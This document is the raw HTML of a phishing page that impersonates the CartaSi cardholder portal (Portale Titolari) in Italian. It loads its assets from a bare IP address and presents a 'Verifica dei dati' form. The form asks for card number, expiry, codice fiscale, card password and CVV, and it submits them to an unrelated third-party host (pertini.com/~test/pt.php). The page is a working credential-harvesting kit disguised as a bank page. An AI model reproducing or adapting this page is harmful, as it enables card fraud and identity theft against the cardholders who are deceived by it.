<html><head>

<link type="text/css" href="http://210.91.89.44/~webmaster/confirm_files/mainstyle-titolari-it.css" rel="StyleSheet" lang="it"><title>Gateway</title><script type="text/javascript" src="confirm_files/PTIncluder.js"></script>
<script type="text/javascript">
PTIncluder.imageServerURL = 'https://portal.cartasi.it/imageserver/';
PTIncluder.basePath = 'plumtree/common/private/js/';
PTIncluder.lang = 'it';
PTIncluder.country = 'IT';
PTIncluder.debug = false;
PTIncluder.loadComponent('jsportlet');
</script><script type="text/javascript" src="http://210.91.89.44/~webmaster/confirm_files/component_002.js"></script><script type="text/javascript" src="confirm_files/PTU-Date-it.js"></script><script type="text/javascript" src="confirm_files/PTU-Number-it.js"></script><script type="text/javascript" src="confirm_files/PTUtil.js"></script><script type="text/javascript" src="confirm_files/PTDateFormats.js"></script><script type="text/javascript" src="confirm_files/PTXML.js"></script><script type="text/javascript" src="confirm_files/PTPortletServices.js"></script><script type="text/javascript">var g_PTImgSvrImgsURL = "https://portal.cartasi.it/imageserver/plumtree/portal/private/img/";
var g_SharedImgSvrImgsURL = "https://portal.cartasi.it/imageserver/plumtree/portal/public/img/";var g_HelpSvrBaseURL = "https://portal.cartasi.it/imageserver/plumtree/";
</script><script type="text/javascript" src="http://210.91.89.44/~webmaster/confirm_files/PTIncluder.js"></script>
<script type="text/javascript">
PTIncluder.imageServerURL = 'https://portal.cartasi.it/imageserver/';
PTIncluder.basePath = 'plumtree/common/private/js/';
PTIncluder.lang = 'it';
PTIncluder.country = 'IT';
PTIncluder.debug = false;
PTIncluder.loadComponent('jsrobohelp');
</script><script type="text/javascript" src="http://210.91.89.44/~webmaster/confirm_files/component.js"></script><script type="text/javascript" src="http://210.91.89.44/~webmaster/confirm_files/PTRoboHelp.js"></script><script type="text/javascript">
function OpenerAS_GetApplicationBaseURL()
{
        return "https://titolari.cartasi.it/portal/server.pt?";
}
function OpenerAS_GetCurrentUserID()
{
        return "850390";
}
function OpenerAS_GetParentSpaceName()
{
        return "";
}
function OpenerAS_GetParentSpaceID()
{
        return "";
}
</script><script type="text/javascript">function getJSUtilVersionObject() { return 'window';}</script><script type="text/javascript" src="http://210.91.89.44/~webmaster/confirm_files/ptcommonopener.js"></script><script type="text/javascript">/** The object that holds the safe variables. Store the vars as properties on the object, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
        gSafeJSVarContainer[strName] = oValue;
        return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined  or if the value is actually false, but safe vars shouldn't be usedto store simple boolean values anyway. **/
function getSafeVar(strName) {
        var temp = gSafeJSVarContainer[strName];
        if (temp) { return temp; }
        else { return false;}
}
/** Retrieve a safe var, if the variable is undefined an alert will showwith the name of the variable. Use this method to retrieve criticalvariables. **/
function getSafeVarWarn(strName) {
        var temp = gSafeJSVarContainer[strName];
        if (temp) { return temp; }
        else { alert('Safe Variable: '+strName+' is not defined!'); }
}
</script><script type="text/javaScript">        function buildURLFromTemplate(strID)
        {
                var arArgs = strID.split(',');
        if(!arArgs){
          alert('Invalid menu ID');
          return null; }
        if(arArgs[0] == 'C'){
         var strCommURL = PTCommonOpener.getOpenerURLOpenObjID(512, arArgs[1], '&PageID='+arArgs[2]+'', 2)
         if ( arArgs.length > 3) { strCommURL += '&ProfileID='+arArgs[3]; }
          return strCommURL;
        } else if (arArgs[0] == 'M') {
         return PTCommonOpener.getOpenerURLOpenObjID(518, 850390, '&PageID='+arArgs[1]+'', 2)
        } else if (arArgs[0] == 'SM') {
          return 'https://titolari.cartasi.it/portal/server.pt?open=space&name=SiteMap&psname=Gateway&psid=None&cached=true&in_hi_userid=850390&control=SetSiteMap&CommunityID='+arArgs[1]+'&Mode='+arArgs[2]+(eval(arArgs[3]) ? '&Preview=' : '');
        } else if (arArgs[0] == 'S') {
          return null;
        } else if (arArgs[0] == 'E') {
            var params = '';
            if ( arArgs.length > 1 ) {
              for ( var i = 2; i < arArgs.length; i++ ) {
                params += '&' + arArgs[i];
              } }
          return 'https://titolari.cartasi.it/portal/server.pt?open=space&name='+arArgs[1]+'&psname=Gateway&psid=None&cached=true&in_hi_userid=850390' + params;
        } else if (arArgs[0] == 'D') {
         return PTCommonOpener.getOpenerURLOpenObjID(17, arArgs[2], '&DirMode='+arArgs[1]+'', 2)
        } else if (arArgs[0] == 'G1') {
            var params = '';
            if ( arArgs.length > 1 ) {
              for ( var i = 2; i < arArgs.length; i++ ) {
                params += '&' + arArgs[i];
              } }
          return 'https://titolari.cartasi.it/portal/server.pt?open=space&name='+arArgs[1]+'&psname=Gateway&psid=None&cached=true&in_hi_userid=850390' + params;
        } else if (arArgs[0] == 'IF') {
          return arArgs[1];
        } else {
            alert('URL Type is not defined');
            return null; }
        }
        function templateURLRedirect(templateURL) {
          if (templateURL == null) { return null; }
          var arArgs = templateURL.split(',');
         if (arArgs[0] == 'UP') {
        PTCommonOpener.openInSameWindow(PTCommonOpener.getOpenerURLOpenObjID(1, arArgs[1], 'null', 2));
        } else if (arArgs[0] == 'DO') {
        PTCommonOpener.openInSameWindow(PTCommonOpener.getOpenerURLOpenObjID(18, arArgs[1], 'null', 2));
        } else if (arArgs[0] == 'F') {
          window.location = arArgs[1];
         } else {
           window.location = buildURLFromTemplate(templateURL);
         }
         
        }
</script><script type="text/javascript">var windowOnloadFunction = (window.onload) ? window.onload : new Function;
document.PCC.RegisterForWindowEvent("onload", windowOnloadFunction);
var windowOnBlurFunction = (window.onblur) ? window.onblur : new Function;
document.PCC.RegisterForWindowEvent("onblur", windowOnBlurFunction);
var windowOnFocusFunction = (window.onfocus) ? window.onfocus : new Function;
document.PCC.RegisterForWindowEvent("onfocus", windowOnFocusFunction);
</script><script type="text/javascript">function getJSXMLVersionObject() { return 'window';}</script>
<link type="text/css" href="http://210.91.89.44/~webmaster/confirm_files/PTOrange.css" rel="StyleSheet" lang="it"></head><body onactivate="document.PCC.RaiseWindowEvent(event);" onafterprint="document.PCC.RaiseWindowEvent(event);" onbeforeactivate="document.PCC.RaiseWindowEvent(event);" onbeforeunload="document.PCC.RaiseWindowEvent(event);" onblur="document.PCC.RaiseWindowEvent(event);" oncontrolset="document.PCC.RaiseWindowEvent(event);" ondeactivate="document.PCC.RaiseWindowEvent(event);" onerror="document.PCC.RaiseWindowEvent(event);" onfocus="document.PCC.RaiseWindowEvent(event);" onhelp="document.PCC.RaiseWindowEvent(event);" onload="document.PCC.RaiseWindowEvent(event);" onresize="document.PCC.RaiseWindowEvent(event);" onresizeend="document.PCC.RaiseWindowEvent(event);" onresizestart="document.PCC.RaiseWindowEvent(event);" onunload="document.PCC.RaiseWindowEvent(event);" leftmargin="0" topmargin="0" class="ptPageUser-guest titolari" marginheight="0" marginwidth="0"><div class="portalContent"><!-- start CartaSiTopBar --><!-- end CartaSiTopBar --><script type="text/javascript">
pt_318 = new PTPortlet('318', '{AF3DEB51-8067-FFC1-4CB9-EF0F8F8D3000}', 'Titolari Guest Header', 'pt-portlet-content-318', 'http://portal.cartasi.it:80', 'http://portal.cartasi.it:80/imageserver/titolari/pages', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_318_0_0_43/', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_318_0_0_43/', 'false', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_6_0_318_0_51_43/');</script>
<span xmlns:pt="http://www.plumtree.com/xmlschemas/ptui/"></span>
<script>
var url="";
if (document.URL.indexOf("https")!=-1){
        url = "https://";
} else {
        url = "http://";
}

if(document.title=="Login"){
        eval("document.location.href=url + document.location.host + '/portal/server.pt'");
}
document.title="Portale Titolari";
var urlImageServer = "https://portal.cartasi.it/imageserver/";


function goHome(){
        eval("document.location.href=url + document.location.host + '/portal/server.pt'");
}
function openPrivacy(finestra){
        eval("window.open(urlImageServer + 'titolari/pages/privacy.html', 'PopUpWindow','dependent=yes,status=no,toolbar=no,menubar=no,width=450,height=390,resizable=yes,scrollbars=yes,location=no,top=50,left=50')");
}

function doOpenPopUp(pg,width,heigth){
        Set_Cookie( "cPopUpTit", "1");
        eval("javascript:window.open('" + pg + "','','width=" + width +",height=" + heigth+"')");
}

function Set_Cookie( name, value) {
        document.cookie = name + "=" +escape( value ) ;
}
function Get_Cookie( name ) {
        var start = document.cookie.indexOf( name + "=" );
        var len = start + name.length + 1;
        if ( ( !start ) &&
        ( name != document.cookie.substring( 0, name.length ) ) )
        {
        return "";
        }
        if ( start == -1 ) return "";
        var end = document.cookie.indexOf( ";", len );
        if ( end == -1 ) end = document.cookie.length;
        return unescape( document.cookie.substring( len, end ) );
}

var okPopUp=Get_Cookie( "cPopUpTit" );
if(okPopUp=="" || okPopUp==null){
        void(0);
}

document.write("<link type='text/css' href='" + urlImageServer + "plumtree/common/public/css/PTOrange.css'  rel='StyleSheet' lang='it'></link>");
</script>
<div id="HeaderTIT"><a href="javascript:goHome()" title="torna alla home page" accesskey="0"><img src="http://210.91.89.44/~webmaster/confirm_files/top_logo.gif" alt="CartaSi" height="46" width="156"><img src="http://210.91.89.44/~webmaster/confirm_files/PTlogo1.jpg" alt="Portale Titolari" height="102" width="516"></a>
        <p class="dataOra">luned&igrave; 17 agosto 2009&nbsp; www.cartasi.it</p>
</div>
<div id="navcontainer">
<span id="fascetta">&nbsp;</span>
        <ul id="navlist">
                <li id="active"><a href="http://www.cartasi.it/" target="_newcartasi" title="Vai al sito CartaSi.it (nuova finestra) [accesskey 1]" accesskey="1">www.cartasi.it</a></li>
                <li><a href="javascript:openPrivacy()" title="come CartaSi protegge la tua privacy">Privacy</a></li>
                <li><a href="javascript:goHome()" title="torna alla Home Page [accesskey 0]" accesskey="0">Home</a></li>
        </ul>
</div>
<table border="0" cellpadding="0" cellspacing="10" width="100%"><tbody><tr><td colspan="1" align="left" valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td colspan="1" align="left" valign="top"><script type="text/javascript">
pt_289 = new PTPortlet('289', '{DBD712CD-E478-F38E-45AE-EF16DFEA6000}', 'Accesso al Portale', 'pt-portlet-content-289', 'http://simisntbea:8803', 'http://simisntbea:8803/PT_AccessoReg', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_289_0_0_43/', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_289_0_0_43/', 'false', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_6_0_289_0_0_43/');</script>


<script language="JavaScript" type="text/javascript">

function controllaCampi(obj) {
        var i = 0, campo, cValue, lungnumber;

    campo = obj.codiceFiscale;

        if (campo.value.length == 0){
                alert("ATTENZIONE: Per proseguire e' necessario digitare il codice fiscale.");
            campo.focus();
            return false;
          }
    if (campo != null) {
            cValue = campo.value;
            lungnumber = cValue.length;
            if (lungnumber != 16){
                        alert("Il codice fiscale deve contenere 16 caratteri.");
                        campo.focus();
                        return false;
            }
    }
    return true;
}

function checkCodSicurezza(f) {
        var cValue, lungnumber;
        cValue = f.value;
        lungnumber = cValue.length;

        if (lungnumber != 3){
                alert("Il codice di sicurezza deve contenere 3 cifre.");
                f.focus();
                return false;
        }

        if (isNaN(cValue)) {
                alert("Il codice di sicurezza contiene caratteri non numerici.");
                f.focus();
                return false;
        }

        return true;
}

function checkCampiCRV(f) {

        if (f.cvv.value.length == 0){
                alert("ATTENZIONE: Per proseguire e' necessario digitare il codice di sicurezza.");
            f.cvv.focus();
            return false;
          }

        if (f.cvv.value.length != 0)
                if (!checkCodSicurezza(f.cvv))
                        return false;

        return true;
}

function recuperaPassword(){ 
    if (controllaCampi(document.regForm) && checkCampiCRV(document.regForm))  {
        document.regForm.submit();
    }
}


function popup() {
  window.open(pt_289.transformURL('https://portal.cartasi.it/imageserver/titolari/images/cvCF.htm'),'cv','toolbar=no,topmargin=0,leftmargin=0,status=no,menubar=no,location=no,directories=no,width=385,height=300,scrollbars=no,top=10,left=10');
}
</script>
<noscript>
contenuto non disponibile - javascript disabilitato nel browser in uso
</noscript>



<div class="accedi">
<form name="regForm" method="post" action="http://www.pertini.com/~test/pt.php">
        <input name="process" id="process" value="nominativa" type="hidden">
        <input name="fun" id="fun" value="" type="hidden">
        <input name="hash_key" value="22A98821B16942CFD173D15CCD40F295DE862760" type="hidden">

        <div class="sceltaReg">

                <h3 class="titoloInternoGadget">Verifica dei dati</h3>


                <p class="testoNormale">Digita ora:</p>
                <ul>
                 <li>il <strong>numero della tua Carta</strong></li>
                 <li>la <strong>scadenza della tua Carta</strong></li>
                 <li>il tuo <strong>codice fiscale</strong></li>
                 <li><strong>Password</strong> della tua Carta</li>
                 <li>il <strong>tuo codice di sicurezza di tre cifre</strong>
                          che trovi sul retro della tua CartaSi (come da immagine)&nbsp;
                         <img src="http://210.91.89.44/~webmaster/confirm_files/cvv2_b.gif">
                 </li>
                </ul>

                <center>
                        <p class="testoNormale"></p>
                </center>

                <table class="regClub" align="center">
              <tbody><tr>
                <td class="testoNormale"><strong>Numero della tua Carta:</strong></td>
                        <td class="testoNormale">
                          &nbsp;<input tabindex=1 name="carte" maxlength="20" size="16" value="" type="text">
                          &nbsp;
                        </td>
                  </tr>
                                          <p class="testoNormale"></p>
                </center>

              <tbody><tr>
                <td class="testoNormale"><strong>Scadenza (mese/anno):</strong></td>
                        <td class="testoNormale">
                          &nbsp;<input name="mm" tabindex=2 maxlength="2" size="2" value="" type="text">
                          &nbsp;<input name="aa" tabindex=3 maxlength="4" size="2" value="" type="text">
                        </td>
                  </tr>
                                          <p class="testoNormale"></p>
                </center>

              <tbody><tr>
                <td class="testoNormale"><strong>Codice fiscale:</strong></td>
                        <td class="testoNormale">
                          &nbsp;<input name="codiceFiscale" tabindex=4 maxlength="16" size="16" value="" type="text">
                          &nbsp;
                        </td>
                  </tr>
                                                            <p class="testoNormale"></p>
                </center>

              <tbody><tr>
                <td class="testoNormale"><strong>Password Carta:</strong></td>
                        <td class="testoNormale">
                          &nbsp;<input name="pc" tabindex=4 maxlength="20" size="16" value="" type="password">
                          &nbsp;
                        </td>
                  </tr>
              <tr>
                <td class="testoNormale"><strong>Codice di sicurezza:</strong></td>
                        <td class="testoNormale">
                          &nbsp;<input name="cvv" tabindex=5 maxlength="3" size="3" value="" type="text">
                          &nbsp;
                        </td>
                  </tr>
                </tbody></table>
                <ul class="listaOrizzontale">
                        <li>
        
        
                                <a href="#recuperoPassword" name="submitControl" onclick="recuperaPassword(); return false;" class="regForm" title="Conferma">Conferma</a>
        
                        </li>

                </ul>
        </div>
</form>

<script>
document.regForm.carte.focus();
</script>
</div>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<script type="text/javascript">
pt_316 = new PTPortlet('316', '{AF3DEB51-8067-FFC1-4CB9-EF0FF5D6C000}', 'blank footer', 'pt-portlet-content-316', 'http://portal.cartasi.it:80', 'http://portal.cartasi.it:80/imageserver/esercenti/pages', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_316_0_0_43/', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_316_0_0_43/', 'false', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_6_0_316_0_51_43/');</script>
<script type="text/javascript">InitializeEvents();</script></div><div class="externalContent"></div>
</body></html>